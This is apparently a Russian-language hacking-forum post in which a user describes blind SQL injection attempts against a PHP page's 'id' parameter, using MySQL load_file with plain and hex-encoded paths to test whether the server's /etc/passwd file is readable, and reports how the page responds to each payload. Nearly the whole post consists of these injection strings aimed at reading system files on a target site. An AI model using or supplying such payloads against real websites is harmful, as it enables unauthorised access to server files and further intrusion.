
11.08.2015, 16:12
|
|
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами:
5753846
Репутация:
11
|
|
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1
а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.
То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+
и
and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+
просто под рукой сейчас нчего нет что в хекс кодирует строку)
|
|
|